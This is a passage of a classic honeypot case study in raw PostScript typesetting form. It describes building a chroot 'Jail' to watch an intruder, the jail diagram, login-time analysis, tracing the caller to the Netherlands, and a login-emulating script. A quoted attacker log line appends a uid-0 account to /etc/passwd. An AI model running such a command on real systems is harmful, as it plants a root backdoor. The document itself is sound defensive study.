(nf)q(ord)q(.E)q(DU)150 962 y(14:05)114 b(Attempt)25 b(to)f(login)g(to)f (inet)i(with)46 b(bfrd)h(from)f(decaf.Sta)q(nf)q(ord)q(.E)q(DU)150 1001 y(16:07)114 b(echo)24 b("bffr)h(::7007:0::)q(/:)q(/v)q(/bi)q(n/)q(sh")h (>>)e(/etc/o\303Hpa)q(ss)q(wd)150 1041 y(16:08)114 b(echo)24 b("bffr)h(::7007:0::)q(/:)q(/v)q(/bi)q(n/)q(sh")h(>>)e(/etc/passw)q(d)0 1142 y Ff(He)15 b(worked)e(for)h(another)g(hour)f(that)h(afternoon,)h(and)f (from)g(time-to-time)f(over)h(the)g(next)f(week)i(or)f(so.)27 b(I)14 b(went)g(to)g(the)g(Dallas)0 1192 y(\252CNN\272)e(Usenix,)g(where)g (his)g(commands)g(were)h(simulated)e(from)g(the)h(terminal)f(room)g(about)g (twice)h(a)g(day)m(.)20 b(This)11 b(response)h(time)0 1241 y(was)f(stretching)e(credibility)m(,)g(but)g(his)h(faith)f(seemed)j (un\257agging.)0 1374 y Fg(5.)21 b(The)10 b(Jail)83 1470 y Ff(I)h(never)g(intended)e(to)h(use)h(these)h(tools)d(to)h(simulate)h(a)g (system)g(in)f(real-time.)16 b(I)11 b(wanted)g(to)f(watch)g(the)h(cracker)r (')n(s)g(keystrokes,)0 1520 y(to)e(trace)i(him,)f(learn)g(his)f(techniques,)h (and)g(warn)g(his)g(victims.)k(The)d(best)f(solution)d(was)k(to)e(lure)h(him) f(to)h(a)g(sacri\256cial)g(machine)h(and)0 1569 y(tap)h(the)g(connection.)21 b(The)12 b(Ethernet)g(is)g(easy)i(to)d(tap,)i(and)f(modi\256ed)g Fe(tcpdump)g Ff(software)g(can)h(separate)g(and)f(store)g(the)h(sessions.)0 1619 y(But)d(I)h(didn')o(t)f(have)h(a)h(spare)g(machine)f(handy)m(,)h(so)f(I) g(took)f(the)h(software)g(route.)17 b(\(Steve)11 b(Bellovin)f(did)g (construct)g(such)h(a)h(machine.)0 1669 y(W)m(e)f(never)f(managed)h(to)f (lure)g(anyone)g(interesting)f(to)h(it.\))0 1737 y(I)g(consulted)f(the)g (local)h(gurus)f(about)g(the)g(security)h(of)f(a)h Fe(chr)n(oot)g Ff(environment.)k(Their)c(conclusion:)j(it)c(is)g(not)g(perfectly)h(secure,)h (but)0 1787 y(if)d(compilers)h(and)g(certain)f(programs)h(are)h(missing,)e (it)g(is)h(very)g(dif)o(\256cult)e(to)h(escape.)17 b(It)8 b(is)h(also)f(not)g (undetectable,)i(but)e(I)g(\256gured)h(that)0 1836 y(Berferd)i(was)g(always)g (in)f(a)h(hurry)m(,)g(and)f(probably)g(wouldn')o(t)f(notice.)16 b(W)m(e)11 b(constructed)f(such)h(a)g Fe(chr)n(oot)f Ff(\252Jail\272)i(\(or)e (\252roach)h(motel\272\))0 1886 y(and)g(rigged)e(up)i(logged)e(connections)h (to)g(it)g(through)f(our)h(\256rewall)h(machine)g(\(see)g(Figure)g(1\).)k (Accounts)c Fe(berfer)n(d)g Ff(and)g Fe(guest)f Ff(were)0 1936 y(connected)i(to)g(the)f(Jail)h(through)e(this)h(arrangement.)21 b(T)m(wo)13 b(logs)e(were)i(kept)e(per)h(session,)h(one)f(each)h(for)f(input) e(and)i(output.)18 b(The)0 1986 y(logs)10 b(were)h(labeled)f(with)f(starting) g(and)h(ending)g(times.)0 2053 y(The)j(Jail)f(was)i(hard)e(to)g(set)h(up.)21 b(W)m(e)13 b(had)g(to)f(get)g(the)g(access)j(times)e(in)e Fc(/dev)i Ff(right)e(and)h(update)h Fc(utmp)f Ff(for)g(Jail)g(users.)23 b(Several)0 2103 y(raw)13 b(disk)f(\256les)i(were)f(too)f(dangerous)h(to)f (leave)i(around.)23 b(W)m(e)13 b(removed)g Fe(ps)p Ff(,)h Fe(who)p Ff(,)f Fe(w)p Ff(,)h Fe(netstat)p Ff(,)f(and)g(other)f(revealing)h(programs.) 0 2153 y(The)e(\252)p Fe(login)p Ff(\272)g(shell)f(script)g(had)h(to)f (simulate)h Fe(login)e Ff(in)h(several)i(ways)f(\(see)h(Figure)e(2.\))17 b(Diana)11 b(D'Angelo)f(set)h(up)f(a)h(believable)g(\256le)0 2203 y(system)g(\(this)e(is)h Fe(very)i Ff(good)d(system)i(administration)d (practice\))j(and)f(loaded)g(a)h(variety)e(of)h(silly)f(and)i(tempting)e (\256les.)0 2271 y(A)k(little)e(later)h(Berferd)h(discovered)f(the)h(Jail)f (and)h(rattled)f(around)g(in)g(it.)21 b(He)13 b(looked)f(for)g(a)i(number)e (of)h(programs)f(that)g(we)h(later)0 2320 y(learned)f(contained)f(his)h (favorite)e(security)i(holes.)19 b(T)m(o)12 b(us)g(the)f(Jail)h(was)g(not)f (very)h(convincing,)f(but)g(Berferd)g(seemed)j(to)d(shrug)g(it)0 2370 y(of)o(f)f(as)h(part)f(of)g(the)g(strangeness)h(of)f(our)f(gateway)m(.)0 2503 y Fg(6.)21 b(T)m(racing)10 b(Berferd)83 2599 y Ff(Berferd)g(spent)h(a)g (lot)e(of)h(time)h(in)f(our)g(Jail.)15 b(I)c(spent)f(a)h(lot)e(of)i(time)f (talking)f(to)h(Stephen)g(Hansen)h(at)g(Stanford.)k(Stephen)10 b(spent)0 2648 y(a)g(lot)e(of)h(time)h(trying)d(to)i(get)g(a)h(trace.)16 b(Berferd)9 b(was)h(attacking)f(us)g(through)f(one)h(of)g(several)h(machines) g(at)g(Stanford.)k(He)c(connected)p eop %%Page: 9 9 8 bop 0 1020 a @beginspecial -40 @hoffset @setspecial %%BeginDocument: jail.eps %!PS-Adobe-2.0 EPSF-1.2 %%Title: njail.eps %%Creator: Canvas 3.0 %%For: sharon %%CreationDate: Tue, Nov 5, 1991 3:53 PM %%BoundingBox:99 0 448 242 %%DocumentProcSets: CanvasDict %%DocumentSuppliedProcSets: CanvasDict %%Copyright ©1988-91 Deneba Systems, Inc. - All Rights Reserved Worldwide %%DocumentFonts: Courier %%DocumentNeededFonts: Courier %%EndComments %%BeginProcSet:CanvasDict /CanvasDict where not{/CanvasDict 250 dict def}{pop}ifelse CanvasDict begin systemdict/setpacking known{/origpack currentpacking def true setpacking}if /bdf{bind def}bind def /xdf{exch bind def}bdf /min{2 copy gt{exch}if pop}bdf /edf{exch def}bdf /max{2 copy lt{exch}if pop}bdf /cvmtx matrix def /tpmx matrix def /currot 0 def /rotmtx matrix def /origmtx matrix def /cvangle{360 exch sub 90 add 360 mod}bdf /setrot{/currot edf rotmtx currentmatrix pop 2 copy translate currot rotate neg exch neg exch translate}bdf /endrot{rotmtx setmatrix}bdf /i systemdict/image get def/T true def/F false def/dbg F def /ncolors 0 def/st0 ()def/st1 ()def/proc0 {}def /penh 1 def/penv 1 def/penv2 0 def/penh2 0 def/samplesize 0 def/width 0 def/height 0 def /setcmykcolor where not{/setcmykcolor{/b edf 3{b add 1.0 exch sub 0.0 max 1.0 min 3 1 roll}repeat systemdict begin setrgbcolor end}bdf}{pop}ifelse /doeoclip{closepath{eoclip}stopped{currentflat dup 2 mul setflat eoclip setflat}if}bdf /SpaceExtra 0 def/LetterSpace 0 def/StringLength 0 def/NumSpaces 0 def/JustOffset 0 def /f0/fill load def /s0{1 setlinewidth cvmtx currentmatrix pop penh penv scale stroke cvmtx setmatrix}bdf /f1{_bp _fp impat}def /s1{cvmtx currentmatrix pop 1 setlinewidth penh penv scale {strokepath}stopped{currentflat dup 2 mul setflat strokepath setflat}if _bp cvmtx setmatrix _fp impat}def /filltype 0 def /stroketype 0 def /f{filltype 0 eq{f0}{f1}ifelse}bdf /s{stroketype 0 eq{s0}{s1}ifelse}bdf /_fp{}def /_bp{}def /_fg 1 def /_pg 0 def /_bkg 1 def /_frg 0 def /_frgb 3 array def /_frrgb [0 0 0] def /_fcmyk 4 array def /_frcmyk [0 0 0 1] def /_prgb 3 array def /_pcmyk 4 array def /_bkrgb [1 1 1] def /_bkcmyk [0 0 0 0] def /fg{/_fg exch def /filltype 0 def/fills{_fg setgray}def}def /frgb{_frgb astore pop /filltype 0 def/fills{_frgb aload pop setrgbcolor}def}def /fcmyk{_fcmyk astore pop /filltype 0 def/fills{_fcmyk aload pop setcmykcolor}def}def /pg{/_pg exch def /stroketype 0 def/pens{_pg setgray}def}def /prgb{_prgb astore pop /stroketype 0 def/pens{_prgb aload pop setrgbcolor}def}def /pcmyk{_pcmyk astore pop /stroketype 0 def/pens{_pcmyk aload pop setcmykcolor}def}def /fpat{/fstr edf/filltype 1 def/fills{/patstr fstr def}bdf}bdf /ppat{/sstr edf/stroketype 1 def/pens{/patstr sstr def}bdf}bdf /bkg{ /_bkg exch def /_bp{gsave _bkg setgray fill grestore}def}def /bkrgb{_bkrgb astore pop/_bp{gsave _bkrgb aload pop setrgbcolor fill grestore}def}def /bkcmyk{_bkcmyk astore pop/_bp{gsave _bkcmyk aload pop setcmykcolor fill grestore}def}def /frg{ /_frg exch def /_fp{_frg setgray}def}def /frrgb{_frrgb astore pop/_fp{_frrgb aload pop setrgbcolor}def}def /frcmyk{_frcmyk astore pop/_fp{_frcmyk aload pop setcmykcolor}def}def /icomp{/ncolors edf ncolors 1 gt{/proc0 edf dup dup 0 get ncolors div cvi exch 0 3 -1 roll put 4 -1 roll ncolors div cvi 4 1 roll{proc0 dup/st0 edf 0 exch ncolors exch length dup ncolors sub exch ncolors div cvi string/st1 edf {dup 0 exch dup 1 exch 2 add{st0 exch get add}bind for 3 div ncolors 4 eq{exch dup 3 1 roll 3 add st0 exch get add 255 exch sub dup 0 lt{pop 0}if}if cvi dup 255 gt{pop 255}if exch ncolors div cvi exch st1 3 1 roll put}bind for st1}}if i}bdf /ci {/colorimage where {pop false exch colorimage} {icomp} ifelse}bdf /impat {/cnt 0 def /MySave save def currot 0 ne{currot neg rotate}if clip flattenpath pathbbox 3 -1 roll 8 div floor 8 mul dup/starty edf sub abs 8 div ceiling 8 mul cvi/height edf exch 8 div floor 8 mul dup/startx edf sub abs 8 div ceiling 8 mul cvi/width edf startx starty translate width height scale /height height 8 mul def /st0 width string def width height T [width 0 0 height neg 0 height] {patstr cnt 8 mod get/st1 edf 0 1 st0 length 1 sub dup 0 le{pop 1}if {st0 exch st1 put}bind for/cnt cnt 1 add def st0}bind imagemask MySave restore newpath}bdf /cm{/ncolors edf translate scale/height edf/colorimage where {pop} {ncolors mul}ifelse/width edf /tbitstr width string def width height 8 [width 0 0 height neg 0 height] {currentfile tbitstr readhexstring pop}bind ncolors dup 3 eq {ci}{icomp}ifelse}bdf /im{translate scale /height edf /width edf /tbitstr width 7 add 8 div cvi string def width height 1 [width 0 0 height neg 0 height] {currentfile tbitstr readhexstring pop}bind i}bdf /imk{/invFlag edf translate scale /height edf /width edf /tbitstr width 7 add 8 div cvi string def width height invFlag [width 0 0 height neg 0 height] {currentfile tbitstr readhexstring pop}bind imagemask}bdf /BeginEPSF {/MySave save def /dict_count countdictstack def /op_count count 1 sub def userdict begin /showpage {} def 0 setgray 0 setlinecap 1 setlinewidth 0 setlinejoin 10 setmiterlimit [] 0 setdash newpath /languagelevel where {pop languagelevel 1 ne{false setstrokeadjust false setoverprint}if}if }bdf /EndEPSF {count op_count sub {pop}repeat countdictstack dict_count sub {end}repeat MySave restore}bdf /rectpath {/cv_r edf/cv_b edf/cv_l edf/cv_t edf cv_l cv_t moveto cv_r cv_t lineto cv_r cv_b lineto cv_l cv_b lineto cv_l cv_t lineto closepath}bdf /setpen{/penh edf/penv edf/penv2 penv 2 div def/penh2 penh 2 div def}bdf /dostroke{not 1 currentgray ne or {pens s}if}bdf /dodashfill{not 1 currentgray ne or {fills gsave f grestore gsave [] 0 setdash stroketype/stroketype filltype def s/stroketype edf grestore}if}bdf /dofill{not 1 currentgray ne or {fills f}if}bdf /dofillsave{not 1 currentgray ne or {gsave fills f grestore}if}bdf /doline{not 1 currentgray ne or {pens filltype/filltype stroketype def f/filltype edf}if}bdf /spx{SpaceExtra 0 32 4 -1 roll widthshow}bdf /lsx{SpaceExtra 0 32 LetterSpace 0 6 -1 roll awidthshow}bdf /Rjust{stringwidth pop JustOffset exch sub /JustOffset edf}bdf /Cjust{stringwidth pop 2 div JustOffset exch sub /JustOffset edf}bdf /adjfit{stringwidth pop LetterSpace StringLength 1 sub mul add SpaceExtra NumSpaces mul add dup /pw edf JustOffset exch sub dup /wdif edf StringLength div LetterSpace add /LetterSpace edf}bdf /ulb{currentpoint pop /underlinpt edf}bdf /ule{gsave currentpoint newpath moveto currentfont dup /ft1 known{dup /ft1 get begin /FontMatrix get FontMatrix tpmx concatmatrix pop} {begin FontMatrix tpmx copy pop}ifelse FontInfo begin UnderlinePosition UnderlineThickness end end dup tpmx dtransform pop setlinewidth dup tpmx dtransform pop 0 exch rmoveto underlinpt currentpoint pop sub 0 rlineto stroke grestore}bdf /fittext{ /SpaceExtra edf /LetterSpace edf /StringLength edf /NumSpaces edf /JustOffset edf not 1 currentgray ne or {dup {ulb}if exch dup adjfit lsx {ule}if}{pop pop}ifelse}bdf /cvRecFont{/encod edf FontDirectory 2 index known{cleartomark}{findfont dup length 1 add dict begin {1 index/FID ne{def}{pop pop}ifelse}forall encod{/Encoding CVvec def}if currentdict end definefont cleartomark}ifelse}bdf /wrk1 ( ) def/wdict 16 dict def /Work75 75 string def /Nmk{Work75 cvs dup}bdf /Npt{put cvn}bdf /dhOdh{Nmk 2 79 Npt}bdf /dhodh{Nmk 2 111 Npt}bdf /dhSdh{Nmk 2 83 Npt}bdf /sfWidth{gsave 0 0 moveto 0 0 lineto 0 0 lineto 0 0 lineto closepath clip stringwidth grestore}bdf /MakOF{dup dhodh FontDirectory 1 index known{exch pop}{exch findfont dup length 1 add dict begin {1 index/FID ne 2 index /UniqueID ne and{def}{pop pop}ifelse}forall /PaintType 2 def /StrokeWidth .24 1000 mul ftSize div dup 12 lt{pop 12}if def dup currentdict end definefont pop}ifelse}bdf /fts{dup/ftSize edf}def /mkFT{/tempFT 11 dict def tempFT begin /FontMatrix [1 0 0 1 0 0] def/FontType 3 def FontDirectory 3 index get /Encoding get/Encoding exch def /proc2 edf/ft2 exch findfont def/ft1 exch findfont def/FontBBox [0 0 1 1] def /BuildChar{wdict begin/chr edf/ftdt edf/chrst wrk1 dup 0 chr put def ftdt/proc2 get exec end}def end tempFT definefont pop}bdf /OLFt{dup dhOdh FontDirectory 1 index known{exch pop} {dup 3 -1 roll dup MakOF {outproc} mkFT}ifelse}bdf /mshw{moveto show}bdf /outproc{ftdt/ft1 get setfont gsave chrst sfWidth grestore setcharwidth dblsh}bdf /dblsh{currentgray 1 setgray chrst 0 0 mshw setgray ftdt/ft2 get setfont chrst 0 0 mshw}bdf /ShadChar{ftdt/ft1 get setfont gsave chrst sfWidth 1 index 0 ne{exch .05 add exch}if grestore setcharwidth chrst .06 0 mshw 0 .05 translate dblsh}bdf /ShFt{dup dhSdh FontDirectory 1 index known{exch pop} {dup 3 -1 roll dup MakOF {ShadChar} mkFT}ifelse}bdf /LswUnits{72 75 div dup scale}bdf /erasefill{_bp}def /CVvec 256 array def /NUL/SOH/STX/ETX/EOT/ENQ/ACK/BEL/BS/HT/LF/VT/FF/CR/SO/SI/DLE/DC1/DC2/DC3/DC4/NAK/SYN/ETB/CAN/EM/SUB/ESC/FS/GS/RS/US CVvec 0 32 getinterval astore pop CVvec 32/Times-Roman findfont/Encoding get 32 96 getinterval putinterval CVvec dup 39/quotesingle put 96/grave put /Adieresis/Aring/Ccedilla/Eacute/Ntilde/Odieresis/Udieresis/aacute /agrave/acircumflex/adieresis/atilde/aring/ccedilla/eacute/egrave /ecircumflex/edieresis/iacute/igrave/icircumflex/idieresis/ntilde/oacute /ograve/ocircumflex/odieresis/otilde/uacute/ugrave/ucircumflex/udieresis /dagger/degree/cent/sterling/section/bullet/paragraph/germandbls /registered/copyright/trademark/acute/dieresis/notequal/AE/Oslash /infinity/plusminus/lessequal/greaterequal/yen/mu/partialdiff/summation /product/pi/integral/ordfeminine/ordmasculine/Omega/ae/oslash /questiondown/exclamdown/logicalnot/radical/florin/approxequal/Delta/guillemotleft /guillemotright/ellipsis/blank/Agrave/Atilde/Otilde/OE/oe /endash/emdash/quotedblleft/quotedblright/quoteleft/quoteright/divide/lozenge /ydieresis/Ydieresis/fraction/currency/guilsinglleft/guilsinglright/fi/fl /daggerdbl/periodcentered/quotesinglbase/quotedblbase/perthousand/Acircumflex/Ecircumflex/Aacute /Edieresis/Egrave/Iacute/Icircumflex/Idieresis/Igrave/Oacute/Ocircumflex /apple/Ograve/Uacute/Ucircumflex/Ugrave/dotlessi/circumflex/tilde /macron/breve/dotaccent/ring/cedilla/hungarumlaut/ogonek/caron CVvec 128 128 getinterval astore pop end %%EndProcSet %%BeginSetup CanvasDict begin 0 setlinecap 0 setlinejoin 4 setmiterlimit /currot 0 def origmtx currentmatrix pop [] 0 setdash 1 1 setpen 1 fg 0 pg 0 frg 1 bkg newpath /dbg F def %%EndSetup % ---- Object #1:4 Obj Type: 99 % ---- Object #2:5 Obj Type: 4 2 2 setpen 240.5000 124.5000 2 305.1923 rectpath F dofillsave F dostroke % ---- Object #3:6 Obj Type: 4 91.1667 151.5000 20 271.9615 rectpath F dofillsave F dostroke % ---- Object #4:7 Obj Type: 2 save 0 setgray 14 fts /Courier findfont exch scalefont setfont 0 setgray 168 113 moveto (SETUPSUCKER) F F 88 0 11 0 0 fittext restore % ---- Object #5:8 Obj Type: 2 save 0 setgray 14 fts /Courier findfont exch scalefont setfont 0 setgray 174 149 moveto (CALLSUCKER) F F 80 0 10 0 0 fittext restore % ---- Object #6:9 Obj Type: 2 save 0 setgray 12 fts /Courier findfont exch scalefont setfont 0 setgray 199 56 moveto (JAIL) F F 28 0 4 0 0 fittext restore % ---- Object #7:10 Obj Type: 2 save 0 setgray 18 fts /Courier findfont exch scalefont setfont 0 setgray 173 206 moveto (GATEWAY) F F 77 0 7 0 0 fittext 0 setgray 173 188 moveto (MACHINE) F F 77 0 7 0 0 fittext restore % ---- Object #8:11 Obj Type: 4 218 328.5000 29 445.5000 rectpath F dofillsave F dostroke % ---- Object #9:12 Obj Type: 2 save 0 setgray 18 fts /Courier findfont exch scalefont setfont 0 setgray 345 196 moveto (FIREWALL) F F 88 0 8 0 0 fittext restore % ---- Object #10:15 Obj Type: 6 413.5000 82 moveto 413.5000 77.0632 403.3421 73 391 73 curveto 378.6579 73 368.5000 77.0632 368.5000 82 curveto 368.5000 86.9368 378.6579 91 391 91 curveto 403.3421 91 413.5000 86.9368 413.5000 82 curveto closepath F dofillsave F dostroke % ---- Object #11:16 Obj Type: 6 413.5000 82 moveto 413.5000 77.0632 401.3105 73 386.5000 73 curveto 371.6895 73 359.5000 77.0632 359.5000 82 curveto 359.5000 86.9368 371.6895 91 386.5000 91 curveto 401.3105 91 413.5000 86.9368 413.5000 82 curveto closepath F dofillsave F dostroke % ---- Object #12:17 Obj Type: 7 414 49 moveto 413.9957 48.7731 lineto 413.9616 48.3197 lineto 413.8935 47.8672 lineto 413.7914 47.4160 lineto 413.6554 46.9668 lineto 413.4858 46.5201 lineto 413.2824 46.0758 lineto 413.0461 45.6356 lineto 412.7768 45.1995 lineto 412.4749 44.7681 lineto 412.1406 44.3416 lineto 411.7741 43.9205 lineto 411.3767 43.5060 lineto 410.9484 43.0983 lineto 410.4897 42.6978 lineto 410.0012 42.3049 lineto 409.4835 41.9202 lineto 408.9364 41.5436 lineto 408.3619 41.1764 lineto 407.7603 40.8190 lineto 407.1323 40.4715 lineto 406.4785 40.1343 lineto 405.7991 39.8076 lineto 405.0962 39.4925 lineto 404.3701 39.1890 lineto 403.6216 38.8973 lineto 402.8517 38.6181 lineto 402.0613 38.3514 lineto 401.2499 38.0973 lineto 400.4213 37.8569 lineto 399.5751 37.6301 lineto 398.7125 37.4171 lineto 397.8343 37.2182 lineto 396.9417 37.0337 lineto 396.0346 36.8635 lineto 395.1165 36.7084 lineto 394.1873 36.5682 lineto 393.2476 36.4430 lineto 392.2996 36.3333 lineto 391.3426 36.2388 lineto 390.3804 36.1601 lineto 389.4129 36.0969 lineto 388.4412 36.0495 lineto 387.4665 36.0178 lineto 386.4900 36.0020 lineto 386 36 lineto F dostroke % ---- Object #13:18 Obj Type: 7 388 36 moveto 387.5113 36.0020 lineto 386.5348 36.0178 lineto 385.5601 36.0494 lineto 384.5884 36.0969 lineto 383.6208 36.1600 lineto 382.6586 36.2387 lineto 381.7017 36.3332 lineto 380.7536 36.4429 lineto 379.8144 36.5679 lineto 378.8851 36.7081 lineto 377.9666 36.8633 lineto 377.0594 37.0334 lineto 376.1669 37.2180 lineto 375.2887 37.4168 lineto 374.4260 37.6298 lineto 373.5798 37.8566 lineto 372.7512 38.0970 lineto 371.9401 38.3509 lineto 371.1493 38.6177 lineto 370.3793 38.8970 lineto 369.6309 39.1886 lineto 368.9047 39.4921 lineto 368.2010 39.8076 lineto 367.5223 40.1339 lineto 366.8685 40.4710 lineto 366.2405 40.8185 lineto 365.6389 41.1760 lineto 365.0646 41.5430 lineto 364.5172 41.9197 lineto 363.9994 42.3044 lineto 363.5109 42.6972 lineto 363.0522 43.0978 lineto 362.6238 43.5055 lineto 362.2264 43.9199 lineto 361.8599 44.3411 lineto 361.5257 44.7673 lineto 361.2237 45.1988 lineto 360.9543 45.6350 lineto 360.7179 46.0752 lineto 360.5144 46.5195 lineto 360.3448 46.9662 lineto 360.2088 47.4154 lineto 360.1066 47.8666 lineto 360.0384 48.3191 lineto 360.0043 48.7725 lineto 360 49 lineto F dostroke % ---- Object #14:19 Obj Type: 3 gsave newpath 413.5000 82 moveto 413.5000 46 lineto F dostroke grestore % ---- Object #15:20 Obj Type: 3 gsave newpath 359.5000 82 moveto 359.5000 46 lineto F dostroke grestore % ---- Object #16:21 Obj Type: 2 save 0 setgray 12 fts /Courier findfont exch scalefont setfont 0 setgray 372 55 moveto (LOGS) F F 28 0 4 0 0 fittext restore % ---- Object #17:22 Obj Type: 3 gsave newpath 167.5000 155 moveto 153.1556 150.6140 lineto 153.1553 159.3851 lineto 167.5000 155 lineto closepath F doline grestore gsave newpath 104.5000 155 moveto 153.1554 155 lineto F dostroke grestore % ---- Object #18:23 Obj Type: 3 gsave newpath 212.5000 74 moveto 208.1148 88.3447 lineto 216.8860 88.3444 lineto 212.5000 74 lineto closepath F doline grestore gsave newpath 212.5000 110 moveto 212.5000 88.3446 lineto F dostroke grestore % ---- Object #19:24 Obj Type: 4 164 356.5000 110 419.5000 rectpath F dofillsave F dostroke % ---- Object #20:25 Obj Type: 3 gsave newpath 387.5000 79 moveto 383.6180 93.4890 lineto 392.3838 93.1827 lineto 387.5000 79 lineto closepath F doline grestore gsave newpath 388.5000 109 moveto 387.9779 93.3366 lineto F dostroke grestore % ---- Object #21:26 Obj Type: 3 gsave newpath 356.5000 155 moveto 342.1556 150.6140 lineto 342.1553 159.3851 lineto 356.5000 155 lineto closepath F doline grestore gsave newpath 257.5000 155 moveto 342.1554 155 lineto F dostroke grestore % ---- Object #22:27 Obj Type: 3 gsave newpath 258.5000 117 moveto 272.8447 121.3851 lineto 272.8447 112.6148 lineto 258.5000 117 lineto closepath F doline grestore gsave newpath 355.5000 117 moveto 272.8447 117 lineto F dostroke grestore % ---- Object #23:28 Obj Type: 2 save 0 setgray 12 fts /Courier findfont exch scalefont setfont 0 setgray 370 132 moveto (LDCON) F F 35 0 5 0 0 fittext restore origmtx setmatrix systemdict /setpacking known {origpack setpacking} if end showpage %%EndDocument: %%EndDocument @endspecial 681 1091 a Fg(Figur)o(e)12 b(1:)35 b Ff(Connections)9 b(to)h(the)g(Jail.)p 300 1138 1351 2 v 0 1246 a(to)e(those)h(machines)h(from) e(a)i(terminal)e(server)h(connected)h(to)e(a)h(Gandalf)g(switch.)14 b(He)c(connected)f(to)f(the)h(Gandalf)f(over)h(a)h(telephone)0 1296 y(line.)0 1364 y(I)g(checked)h(the)f(times)g(he)g(logged)f(in)g(to)h (make)h(a)f(guess)h(about)e(the)h(time)g(zone)g(he)g(might)f(be)h(in.)15 b(Here)c(was)f(a)h(simple)f(graph)f(I)h(made)0 1414 y(of)g(his)g(session)g (start)g(times)g(\(PST\):)733 1488 y Fb(1)202 b(2)352 1527 y(Jan)91 b(0123456789)q(01)q(234)q(56)q(78)q(901)q(23)329 1566 y(s)23 b(19)517 b(x)329 1606 y(s)23 b(20)517 b(xxxx)329 1645 y(m)23 b(21)180 b(x)23 b(x)68 b(xxxx)329 1685 y(t)23 b(22)404 b(xxxxx)47 b(x)329 1724 y(w)23 b(23)203 b(xx)68 b(x)23 b(xx)68 b(x)23 b(xx)329 1764 y(t)g(24)337 b(x)180 b(x)329 1803 y(f)23 b(25)248 b(x)45 b(xxxx)329 1842 y(s)23 b(26)329 1882 y(s)g(27)225 b(xxxx)136 b(xx)68 b(x)329 1921 y(m)23 b(28)203 b(x)23 b(x)179 b(x)329 1961 y(t)23 b(29)203 b(x)224 b(xxxx)24 b(x)329 2000 y(w)f(30)472 b(x)329 2040 y(t)23 b(31)91 b(xx)352 2079 y(Feb)g(0123456789)q (01)q(234)q(56)q(78)q(901)q(23)329 2118 y(f)46 b(1)247 b(x)202 b(x)45 b(x)329 2158 y(s)h(2)359 b(x)22 b(xx)i(xxx)329 2197 y(s)46 b(3)247 b(x)45 b(x)90 b(xxxx)24 b(x)329 2237 y(m)46 b(4)448 b(x)0 2321 y Ff(It)11 b(seemed)j(to)d(suggest)h(a)g(sleep)g(period)f (on)h(the)g(east)g(coast)g(of)g(the)g(U.S.,)h(but)e(programmers)i(are)f (noted)g(for)f(strange)h(hours.)19 b(This)0 2371 y(analysis)10 b(wasn')o(t)g(very)h(useful,)f(but)f(was)i(worth)e(a)i(try)m(.)0 2439 y(Stanford')n(s)f(battle)g(with)g(Berferd)g(is)h(an)g(entire)f(story)g (on)h(its)f(own,)h(and)g(I)g(only)e(know)i(the)f(outlines)g(of)g(their)g(ef)o (forts.)17 b(It)10 b(took)g(them)0 2488 y(a)j(long)f(time)g(to)g(arrange)h (for)f(a)h(trace,)h(and)f(they)f(eventually)g(obtained)f(several.)23 b(The)13 b(calls)g(came)h(from)e(the)h(Netherlands.)21 b(The)0 2538 y(Dutch)10 b(phone)g(company)g(refused)h(to)e(continue)h(the)g(trace)h (to)e(the)h(caller)h(because)h(hacking)d(was)i(legal)f(and)h(there)f(was)h (no)f(treaty)g(in)0 2588 y(place.)16 b(\(A)10 b(treaty)g(requires)g(action)g (by)g(the)g(Executive)g(branch)h(and)f(approval)g(by)f(the)i(U.S.)g (Senate.\))0 2656 y(In)e(January)m(,)i(W)n(ietse)g(V)-5 b(enema)11 b(of)f(Eindhoven)f(University)f(contacted)i(Stanford.)k(W)n(ietse)c(hunted)f (down)g(a)i(group)d(of)i(hackers,)h(and)0 2706 y(identi\256ed)e(Berferd,)h (including)e(his)i(name,)i(address,)f(and)f(phone)g(number)n(.)k(He)d(also)f (kept)g(an)g(eye)h(on)f(Berferd')n(s)f(friends)h(and)g(their)p eop %%Page: 10 10 9 bop 150 66 a Fb(#)157 b(setupsuc)q(ker)26 b(login)150 145 y(SUCKERROO)q(T=)q(/us)q(r/)q(spo)q(ol)q(/h)q(ack)q(er)150 184 y(login=`ec)q(ho)g($CDEST)f(|)e(cut)g(-f4)h(-d!`)g(#)f(extract)i(login)g (from)f(service)h(name)150 224 y(home=`egr)q(ep)h("\303$login:)q(")g ($SUCKERROO)q(T/)q(etc)q(/p)q(ass)q(wd)g(|)d(cut)h(-d:)f(-f6`)150 303 y(PATH=/v:/)q(bs)q(d43)q(:/)q(sv;)116 b(export)25 b(PATH)150 342 y(HOME=$hom)q(e;)295 b(export)25 b(HOME)150 382 y(USER=$log)q(in)q(;)272 b(export)25 b(USER)150 421 y(SHELL=/v/)q(sh)q(;)272 b(export)25 b(SHELL)150 461 y(unset)f(CSOURCE)i(CDEST)e(#)f(hide)h(these)h(Datakit)g (strings)150 539 y(#get)f(the)g(tty)f(and)h(pid)g(to)f(set)h(up)f(the)h(fake) g(utmp)150 579 y(tty=`/bin)q(/w)q(ho)i(|)d(/bin/grep)j($login)f(|)e (/usr/bin/c)q(ut)j(-c15-17)f(|)e(/bin/tail)j(-1`)150 618 y(/usr/adm/)q(ut)q (too)q(ls)q(/te)q(ln)q(et)q(use)q(ro)q(n)f(/usr/spo)q(ol)q(/ha)q(ck)q(er)q (/et)q(c/)q(utm)q(p)h(\\)329 658 y($login)f($tty)f($$)g(1>/dev/nul)q(l)i (2>/dev/nul)q(l)150 737 y(chown)e($login)h(/usr/spo)q(ol)q(/ha)q(ck)q(er/)q (de)q(v/)q(tty)q($t)q(ty)h(1>/dev/nu)q(ll)g(2>/dev/nu)q(ll)150 776 y(chmod)e(622)g(/usr/spoo)q(l/)q(ha)q(cke)q(r/)q(dev)q(/t)q(ty)q($tt)q(y) i(1>/dev/nul)q(l)g(2>/dev/nul)q(l)150 855 y(/etc/chro)q(ot)g(/usr/spoo)q(l/)q (hac)q(ke)q(r)f(/v/su)g(-c)e("$login")j(/v/sh)e(-c)g("cd)f($HOME;)329 894 y(exec)h(/v/sh)h(/etc/prof)q(ile)q(")150 934 y(/usr/adm/)q(ut)q(too)q(ls) q(/te)q(ln)q(et)q(use)q(ro)q(ff)h(/usr/spoo)q(l/h)q(ac)q(ke)q(r/e)q(tc)q(/ut) q(mp)g($tty)e(\\)329 973 y(>/dev/nu)q(ll)i(2>/dev/nu)q(ll)0 1106 y Fg(Figur)o(e)17 b(2:)45 b Ff(The)17 b Fe(setupsucker)f Ff(shell)f(script)g(emulates)h Fe(login)p Ff(,)g(and)g(it)e(is)i(quite)e (tricky)m(.)31 b(W)m(e)16 b(had)f(to)g(make)i(the)e(environment)0 1156 